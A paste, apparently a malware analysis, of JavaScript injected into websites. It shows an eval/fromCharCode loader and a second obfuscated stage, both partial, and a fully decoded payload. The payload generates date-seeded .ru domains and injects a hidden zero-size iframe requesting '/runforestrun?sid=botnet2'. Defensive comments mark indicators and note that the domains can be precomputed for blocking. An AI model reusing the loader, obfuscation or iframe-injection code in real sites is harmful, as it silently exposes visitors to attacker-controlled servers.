
Quttera web malware scanner detected malicious JavaScript

a guest
Jul 29th, 2013
  1. /*
  2.  * Quttera web malware scanner detected malicious JavaScript code that injects hidden iframes pointing to
  3.  * multiple domains in the *.ru zone
  4.  */
  5.  
  6. /*
  7.  * first obfuscation level
  8.  */
  // Stage 1 loader: window.eval() executes the string that String.fromCharCode() builds from the
  // decimal character codes. The visible prefix decodes to `try{prototype%2;}catch(asd){x=2;}try{q=doc`
  // and the visible suffix ends with `if(f)e(s);}`, i.e. the stage-2 script listed below.
  // The code list is elided in this paste (the " ... " in the middle), so this line is an excerpt,
  // not a complete sample, and does not parse as shown.
  // NOTE(review): the random-looking comments around the call (km0ae9gr6m, qhk6sa6g1c) presumably
  // delimit the injected snippet; confirm against other infected files before treating them as a signature.
  9. /*km0ae9gr6m*/window.eval(String.fromCharCode(116,114,121,123,112,114,111,116,111,116,121,112,101,37,50,59,125,99,97,116,99,104,40,97,115,100,41,123,120,61,50,59,125,116,114,121,123,113,61,100,111,99,11 ... 8,34,34,41,59,102,111,114,40,59,49,55,55,54,45,53,43,53,62,105,59,105,43,61,49,41,123,106,61,105,59,105,102,40,101,41,115,61,115,43,114,91,102,114,43,40,40,101,41,63,34,67,111,100,101,34,58,49,50,41,93,40,40,119,91,106,93,47,40,53,43,101,40,34,106,37,50,34,41,41,41,41,59,125,10,105,102,40,102,41,101,40,115,41,59,125,10));/*qhk6sa6g1c*/
  10.  
  11. /*
  12.  * second obfuscation level
  13.  */
  // Stage 2: the decoded, re-indented form of stage 1. Every name is an implicit global and the
  // control flow is steered by deliberately thrown exceptions. The sensitive names are assembled
  // from string fragments, so the literals "eval", "fromCharCode" and "createElement" never appear.
  // NOTE(review): `v`, `f` and the numeric array that ends up in `w` are never assigned in this
  // excerpt, and line 27 is not valid JavaScript as pasted (two adjacent string literals).
  // Presumably assignments were lost in transcription (e.g. `v = "eva"` after `fr = "fromChar"`);
  // confirm against a complete sample.
  14. try {
  15.     prototype % 2; // bare identifier not declared in this excerpt; presumably throws so the catch runs
  16. } catch (asd) {
  17.     x = 2; // truthy flag read by the ternary on line 20
  18. }
  19. try {
      // As pasted, `?:` binds looser than `+`, so a truthy x selects the key "cr". The fragments
      // suggest the original parenthesised the ternary so the key spelled "createElement".
      // Either way this try is expected to throw (calling a missing method, or appendChild()
      // with a string instead of a node), which hands control to the catch below.
  20.     q = document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" + ((f) ? "e" + "n" + "t" : "")]("p");
  21.     q.appendChild(q + "");
  22. } catch (fwbewe) {
  23.     i = 0; // loop counter for the decoder below
  24.     try {
  25.         prototype * 5; // same undeclared-identifier trick as line 15
  26.     } catch (z) {
  27.         fr = "fromChar""eva"; // see NOTE(review) above: not parseable as shown
  28.     }
  29.     if (v) e = window[v + "l"]; // if v is "eva" this resolves window["eval"] (v is not set in this excerpt)
  30.     w = f; // w is indexed as the encoded number array on line 36
  31.     s = []; // accumulator; `s + <string>` on line 36 coerces the empty array to ""
  32.     r = String;
  33.     z = ((e) ? "Code" : ""); // z is not read again in this excerpt
  34.     for (; 1776 - 5 + 5 > i; i += 1) { // 1776 iterations, one per encoded value
  35.         j = i;
      // r[fr + "Code"] is String["fromCharCode"] when fr is "fromChar". Each w[j] is divided by
      // 5 + e("j%2"), i.e. by 5 for even j and by 6 for odd j if e is eval, before being
      // turned back into a character.
  36.         if (e) s = s + r[fr + ((e) ? "Code" : 12)]((w[j] / (5 + e("j%2"))));
  37.     }
  38.     if (f) e(s); // executes the decoded string; the listing below is presented as that payload
  39. }
  40.  
  41.  
  42.  
  43. /*
  44.  * the decoded payload generates hidden iframes that request "/runforestrun?sid=botnet2"
  45.  * on pseudo-random domains in the *.ru zone
  46.  */
  // One step of the payload's number generator. RandomNumberGenerator installs it as `next`, so
  // `this` is the generator object. It updates this.seed and returns this.seed * this.oneOverM.
  // The hi/lo split resembles Schrage's decomposition for a Lehmer generator, but nothing here is
  // truncated to an integer: Q is set to M / A and `/` is floating-point division. Reproducing
  // the sequence (e.g. to precompute domains for blocking) needs the same double arithmetic.
  47. function nextRandomNumber(){
  48.     var hi = this.seed / this.Q; // floating-point quotient, not floored
  49.     var lo = this.seed % this.Q; // remainder against a non-integer Q
  50.     var test = this.A * lo - this.R * hi;
  51.     if(test > 0){
  52.         this.seed = test;
  53.     } else {
  54.         this.seed = test + this.M; // non-positive result is shifted up by the modulus
  55.     }
  56.     return (this.seed * this.oneOverM); // scaled by 1/M
  57. }
  58.  
  // Constructor for the generator state; `unix` is a timestamp in seconds (multiplied by 1000 for Date).
  // The seed uses only the month, the day of the month and a flag for hours above 12, all read
  // through Date's local-time getters. It is therefore identical for every visitor in the same
  // half-day window and time zone, and it does not include the year.
  // For defenders: the domain list for a given date is deterministic and can be computed ahead of time.
  59. function RandomNumberGenerator(unix){
  60.     var d = new Date(unix*1000);
  61.     var s = d.getHours() > 12 ? 1 : 0; // 1 from 13:00 local time onward, else 0
  62.     this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF)+ (Math.round(s * 0xFFF)); // getMonth() is 0-based
  63.     this.A = 48271; // multiplier
  64.     this.M = 2147483647; // modulus (2^31 - 1)
  65.     this.Q = this.M / this.A; // floating-point, not an integer quotient
  66.     this.R = this.M % this.A;
  67.     this.oneOverM = 1.0 / this.M;
  68.     this.next = nextRandomNumber;
  69.     return this;
  70. }
  71.  
  // Advances generator `r` once and scales the result into the Min..Max range, rounded to the
  // nearest integer. Assumes r.next() returns a fraction between 0 and 1 (TODO confirm for all seeds).
  72. function createRandomNumber(r, Min, Max){
  73.     return Math.round((Max-Min) * r.next() + Min);
  74. }
  75.  
  // Domain generation: seeds a fresh generator from `unix`, draws `length` lowercase letters a-z
  // and returns them joined to `zone` with a dot (e.g. "<letters>.ru").
  // The output is a pure function of the seed inputs, so it is the same on every infected page
  // within one seed window.
  76. function generatePseudoRandomString(unix, length, zone){
  77.     var rand = new RandomNumberGenerator(unix);
  78.     var letters = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'];
  79.     var str = '';
  80.     for(var i = 0; i < length; i ++ ){
  81.         str += letters[createRandomNumber(rand, 0, letters.length - 1)]; // index 0..25 into the alphabet
  82.     }
  83.     return str + '.' + zone;
  84. }
  85.  
  // Payload entry point: 500 ms after the script runs, injects one hidden iframe per page.
  // Indicators visible in this block: a 16-letter label under .ru, plain HTTP, the fixed path
  // and query "/runforestrun?sid=botnet2", and an IFRAME with 0px width/height and hidden visibility.
  86. setTimeout(function(){
  87.     try{
  88.         if(typeof iframeWasCreated == "undefined"){ // global guard so the frame is added only once
  89.             iframeWasCreated = true;
  90.             var unix = Math.round(+new Date()/1000); // current time in seconds, from the visitor's clock
  91.             var domainName = generatePseudoRandomString(unix, 16, 'ru');
  92.             ifrm = document.createElement("IFRAME"); // implicit global
  93.             ifrm.setAttribute("src", "http://"+domainName+"/runforestrun?sid=botnet2");
  94.             ifrm.style.width = "0px";
  95.             ifrm.style.height = "0px";
  96.             ifrm.style.visibility = "hidden";
  97.             document.body.appendChild(ifrm);
  98.         }
  99.     }catch(e){} // every error is swallowed, so a failure leaves no console trace
  100. }, 500);